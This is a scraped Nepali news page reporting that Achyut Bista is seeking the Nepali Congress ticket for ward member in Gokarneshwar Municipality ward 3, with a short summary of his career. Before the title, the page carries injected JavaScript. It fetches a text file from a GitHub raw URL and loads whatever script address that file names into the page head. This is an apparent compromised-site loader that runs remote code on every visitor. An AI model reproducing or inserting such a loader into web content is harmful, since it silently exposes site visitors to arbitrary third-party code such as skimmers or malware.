;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वर नगरपालिका वडा नं ३ को वडा सदस्यमा अच्युत बिष्टको दावी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गोकर्णेश्वर नगरपालिका वडा नं ३ को वडा सदस्यमा अच्युत बिष्टको दावी
गोकर्नेश्वोर बिशेष

गोकर्णेश्वर नगरपालिका वडा नं ३ को वडा सदस्यमा अच्युत बिष्टको दावी

जुनेली न्युज, काठमाडौं। 

काठमाडौँ गोकर्णेश्वर नगरपालिका वडा नं ३ को वडा सदस्यमा अच्युत बिष्टले  दाबी गरेकी छन्। आउदो बैशाख ३० मा हुने स्थानीय  चुनाबमा उनले नेपालि काँग्रेस  पार्टी बाट वडा सदस्यमा दावी गरेकी हुन् |

विगत लामो समय देखी सामाजिक सेवामा लाग्दै आएका बिष्ट टाइम्स कलेजका मार्केटिंग म्यानेजर रहेका छन्, भने नेपालको अन्तरास्ट्रिय प्रथम म्याराथुन धावक मिन बहादुर बिष्ट प्रतिष्ठानका उपाध्यक्ष पनि रहेका छन् | सयपत्री टोल सुधार समितिका अध्यक्ष समेत रहेका बिष्ट लायन्स क्लब अफ काठमाडौँ दर्पणका अध्यक्ष पनि हुन् |

बिगत २२ वर्ष देखि शिक्षा क्षेत्रमा काम गरेका उनले  वडा सदस्यमा टिकेट पाए आफुले जित्ने बिष्टको भनाइ छ |

 

फेसबुक प्रतिक्रियाहरु